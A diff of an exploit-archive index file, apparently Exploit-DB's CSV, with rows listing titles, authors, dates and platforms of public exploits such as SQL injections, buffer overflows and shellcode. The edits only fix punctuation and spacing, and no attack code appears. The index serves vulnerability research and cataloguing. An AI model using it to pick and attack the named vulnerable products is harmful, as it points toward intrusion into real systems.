Kiamarsi",php,webapps,0 10058,platforms/php/webapps/10058.pl,"Joomla Recerca component - SQL Injection",2009-10-07,"Don Tukulesto",php,webapps,0 10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure",2009-11-12,"Daniel King",jsp,webapps,0 10060,platforms/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0 @@ -9501,7 +9502,7 @@ id,file,description,date,author,platform,type,port 10192,platforms/php/webapps/10192.txt,"Joomla Component Com_Joomclip - (cat) SQL Injection",2009-11-21,"599eme Man",php,webapps,0 10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 10202,platforms/linux/dos/10202.c,"Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service",2009-10-15,"Simon Vallet",linux,dos,0 -10203,platforms/linux/dos/10203.txt,"BibTeX - '.bib'File Handling Memory Corruption",2009-11-13,"Vincent Lafevre",linux,dos,0 +10203,platforms/linux/dos/10203.txt,"BibTeX - '.bib' File Handling Memory Corruption",2009-11-13,"Vincent Lafevre",linux,dos,0 10204,platforms/windows/dos/10204.txt,"Foxit Reader - COM Objects Memory Corruption Remote Code Execution",2009-11-19,mrx,windows,dos,0 10205,platforms/multiple/dos/10205.txt,"LibTIFF - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-11-12,wololo,multiple,dos,0 10206,platforms/linux/dos/10206.txt,"Expat 2.0.1 - UTF-8 Character XML Parsing Remote Denial of Service",2009-11-12,"Peter Valchev",linux,dos,0 @@ -9510,11 +9511,11 @@ id,file,description,date,author,platform,type,port 10209,platforms/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 10210,platforms/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 -40301,platforms/php/dos/40301.php,"PHP 5.0.0 - domxml_open_file() Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 +40301,platforms/php/dos/40301.php,"PHP 5.0.0 - 'domxml_open_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 40302,platforms/php/dos/40302.php,"PHP 7.0 - Object Cloning Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 40303,platforms/cgi/webapps/40303.sh,"INTELLINET IP Camera INT-L100M20N - Unauthorized Admin Credential Change",2016-08-29,"Todor Donev",cgi,webapps,80 40304,platforms/cgi/webapps/40304.txt,"PLC Wireless Router GPN2.4P21-C-CN - Arbitrary File Disclosure",2016-08-29,"Rahul Raz",cgi,webapps,80 -40305,platforms/php/dos/40305.txt,"PHP 5.0.0 - simplexml_load_file() Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 +40305,platforms/php/dos/40305.txt,"PHP 5.0.0 - 'simplexml_load_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery - (farbinform_krell) SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 10216,platforms/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 @@ -9544,7 +9545,7 @@ id,file,description,date,author,platform,type,port 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 File Hosting Script - Arbitrary File Upload",2009-11-28,DigitALL,php,webapps,0 10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'multipart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos,0 -10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 +10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 10245,platforms/php/webapps/10245.txt,"phpBazar 2.1.1fix - 'cid' SQL Injection",2009-11-28,MizoZ,php,webapps,0 10246,platforms/php/webapps/10246.txt,"SweetRice 0.5.3 - Remote File Inclusion",2009-11-29,"cr4wl3r ",php,webapps,0 10247,platforms/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI - Cross-Site Scripting / HTML Code Injection",2009-11-27,K053,hardware,webapps,0 @@ -9607,7 +9608,7 @@ id,file,description,date,author,platform,type,port 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (1)",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 -10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro'Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps,0 @@ -9627,7 +9628,7 @@ id,file,description,date,author,platform,type,port 10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusion Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (Metasploit)",2009-12-07,dookie,windows,local,0 -10345,platforms/windows/local/10345.py,"gAlan - '.galan'Universal Buffer Overflow",2009-12-07,Dz_attacker,windows,local,0 +10345,platforms/windows/local/10345.py,"gAlan - '.galan' Universal Buffer Overflow",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Exploit",2009-12-07,Global-Evolution,hardware,webapps,0 10349,platforms/linux/dos/10349.py,"CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow",2009-12-02,"Patroklos Argyroudis",linux,dos,80 @@ -9758,20 +9759,20 @@ id,file,description,date,author,platform,type,port 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player.asp player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID'Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam'Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload - Arbitrary File Upload",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' Cross-Site Scripting",2009-12-17,"Juan Galiana Lara",php,webapps,0 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 -10514,platforms/windows/webapps/10514.txt,"dblog - 'dblog.mdb'Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 +10514,platforms/windows/webapps/10514.txt,"dblog - 'dblog.mdb' Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Add Admin Exploit",2009-12-17,RENO,php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -40306,platforms/php/dos/40306.php,"PHP 5.0.0 - xmldocfile() Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 +40306,platforms/php/dos/40306.php,"PHP 5.0.0 - 'xmldocfile()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 40307,platforms/multiple/dos/40307.txt,"Adobe Flash - Selection.setFocus Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Bypass",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload",2009-12-17,Stink,php,webapps,0 @@ -10062,7 +10063,7 @@ id,file,description,date,author,platform,type,port 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 - Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0 10880,platforms/php/webapps/10880.php,"bbScript 1.1.2.1 - 'id' Blind SQL Injection",2009-12-31,cOndemned,php,webapps,0 -10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - '.aap'Buffer Overflow Denial of Service",2009-12-31,jacky,windows,dos,0 +10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service",2009-12-31,jacky,windows,dos,0 10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-31,"D3V!L FUCKER",php,webapps,0 10883,platforms/asp/webapps/10883.txt,"BlogWorx 1.0 Blog - Database Disclosure",2010-01-01,LionTurk,asp,webapps,0 10884,platforms/asp/webapps/10884.txt,"ArticleLive 1.7.1.2 (blogs.php?Id) - SQL Injection",2010-01-01,BAYBORA,asp,webapps,0 @@ -10272,7 +10273,7 @@ id,file,description,date,author,platform,type,port 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 -11192,platforms/windows/dos/11192.txt,"OpenOffice - '.slk'Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos,0 +11192,platforms/windows/dos/11192.txt,"OpenOffice - '.slk' Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos,0 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender - ActiveX Heap Overflow (PoC)",2010-01-19,SarBoT511,windows,dos,0 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow (PoC)",2010-01-19,d3b4g,windows,dos,0 @@ -10357,7 +10358,7 @@ id,file,description,date,author,platform,type,port 11296,platforms/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,"AtT4CKxT3rR0r1ST ",php,webapps,0 11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)",2010-01-30,fred777,php,webapps,0 11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 - Cross-Site Scripting / Improper Permissions",2010-01-30,h00die,php,webapps,80 -11299,platforms/php/webapps/11299.txt,"crownweb - 'page.cfm'SQL Injection",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 +11299,platforms/php/webapps/11299.txt,"crownweb - 'page.cfm' SQL Injection",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11300,platforms/php/webapps/11300.txt,"Creative SplashWorks-SplashSite - 'page.php' Blind SQL Injection",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11301,platforms/php/webapps/11301.txt,"Maian Greetings 2.1 - Arbitrary File Upload",2010-01-31,indoushka,php,webapps,0 11303,platforms/php/webapps/11303.txt,"Saman Portal - SQL Injection",2010-01-31,"Pouya Daneshmand",php,webapps,0 @@ -10505,7 +10506,7 @@ id,file,description,date,author,platform,type,port 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 -11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf'Universal Buffer Overflow",2010-02-16,mr_me,windows,local,0 +11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,windows,local,0 11476,platforms/php/webapps/11476.txt,"SongForever.com Clone - Arbitrary File Upload",2010-02-16,indoushka,php,webapps,0 11477,platforms/php/webapps/11477.txt,"Limny 2.0 - (Change Email and Password) Cross-Site Request Forgery",2010-02-16,"Luis Santana",php,webapps,0 11478,platforms/php/webapps/11478.txt,"Limny 2.0 - Create Admin User Cross-Site Request Forgery Exploit",2010-02-16,"Luis Santana",php,webapps,0 @@ -10552,7 +10553,7 @@ id,file,description,date,author,platform,type,port 11528,platforms/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure",2010-02-22,"ViRuSMaN ",php,webapps,0 11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11530,platforms/php/webapps/11530.txt,"Article Friendly - SQL Injection",2010-02-22,SkuLL-HackeR,php,webapps,0 -11531,platforms/windows/dos/11531.pl,"Windows Media Player 11.0.5721.5145 - '.mpg'Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 +11531,platforms/windows/dos/11531.pl,"Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,"cr4wl3r ",windows,dos,0 11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0 11534,platforms/windows/dos/11534.pl,"VKPlayer 1.0 - '.mid' Denial of Service",2010-02-22,"cr4wl3r ",windows,dos,0 @@ -10596,7 +10597,7 @@ id,file,description,date,author,platform,type,port 11578,platforms/php/webapps/11578.php,"Joomla Component com_joomlaconnect_be - Blind Injection",2010-02-25,snakespc,php,webapps,0 11579,platforms/php/webapps/11579.txt,"WebAdministrator Lite CMS - SQL Injection",2010-02-25,Ariko-Security,php,webapps,0 11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,"ViRuSMaN ",aix,webapps,0 -11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb'Local Universal SEH Overflow",2010-02-26,mr_me,windows,local,0 +11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb' Local Universal SEH Overflow",2010-02-26,mr_me,windows,local,0 11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 @@ -10619,7 +10620,7 @@ id,file,description,date,author,platform,type,port 11604,platforms/php/webapps/11604.php,"Joomla Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 11606,platforms/asp/webapps/11606.txt,"Majoda CMS - (Authentication Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0 -11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service",2010-03-01,"Alberto Ortega",hardware,dos,0 +11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FtpDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service",2010-03-01,"Alberto Ortega",hardware,dos,0 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0 @@ -10670,7 +10671,7 @@ id,file,description,date,author,platform,type,port 11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0 11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0 11669,platforms/windows/dos/11669.py,"JAD java decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0 -11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g - '.class'Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 +11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 11671,platforms/php/webapps/11671.txt,"mhproducts kleinanzeigenmarkt - search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 11672,platforms/php/webapps/11672.txt,"Wild CMS - SQL Injection",2010-03-09,Ariko-Security,php,webapps,0 11674,platforms/php/webapps/11674.txt,"nus newssystem 1.02 - 'id' SQL Injection",2010-03-09,n3w7u,php,webapps,0 @@ -10722,7 +10723,7 @@ id,file,description,date,author,platform,type,port 11726,platforms/php/webapps/11726.txt,"PHP-Fusion 6.01.15.4 - (downloads.php) SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection",2010-03-14,blake,php,webapps,0 -11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - Denial of Service/Crash '.avi'",2010-03-14,En|gma7,windows,dos,0 +11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' Denial of Service/Crash",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 40084,platforms/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 @@ -10813,7 +10814,7 @@ id,file,description,date,author,platform,type,port 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0 11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,php,webapps,0 -11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds'Local crash",2010-03-21,l3D,windows,dos,0 +11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0 11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 - SEH Overwrite Exploit (PoC)",2010-03-21,mr_me,windows,local,0 11829,platforms/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon - 'lexikon.php' SQL Injection",2010-03-21,n3w7u,php,webapps,0 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,"cr4wl3r ",php,webapps,0 @@ -10925,7 +10926,7 @@ id,file,description,date,author,platform,type,port 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,windows,dos,0 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0 -11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker - '.wma'Local Crash",2010-03-30,anonymous,windows,dos,0 +11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos,0 11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0 11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Authentication Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0 11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection",2010-03-30,mat,php,webapps,0 @@ -10979,9 +10980,9 @@ id,file,description,date,author,platform,type,port 12021,platforms/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Admin Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Edit Main Settings Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 -12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin'Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 +12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0 -12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds'Local Crash Exploit",2010-04-03,l3D,windows,dos,0 +12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash Exploit",2010-04-03,l3D,windows,dos,0 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf - (module downloads) SQL Injection",2010-04-03,Inj3ct0r,php,webapps,0 12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,windows,dos,0 @@ -11023,7 +11024,7 @@ id,file,description,date,author,platform,type,port 12070,platforms/php/webapps/12070.txt,"Joomla Magic Updater (com_joomlaupdater) - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0 12072,platforms/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local Denial of Service",2010-04-05,anonymous,windows,dos,0 -12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3'Local Denial of Service",2010-04-05,anonymous,windows,dos,0 +12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service",2010-04-05,anonymous,windows,dos,0 12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)",2010-04-05,R3d-D3V!L,windows,dos,0 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0 12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0 @@ -11176,7 +11177,7 @@ id,file,description,date,author,platform,type,port 12238,platforms/php/webapps/12238.txt,"Joomla Component Deluxe Blog Factory com_blogfactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0 -15732,platforms/linux/dos/15732.txt,"FontForge - .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 +15732,platforms/linux/dos/15732.txt,"FontForge - .BDF Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 @@ -11441,13 +11442,13 @@ id,file,description,date,author,platform,type,port 12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman - Upload",2010-05-08,Sid3^effects,php,webapps,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local,0 -12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf'Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 +12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12543,platforms/php/webapps/12543.rb,"Alibaba Clone 3.0 (Special) - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 - '.asx' Local Denial of Service Crash (PoC)",2010-05-10,"Steve 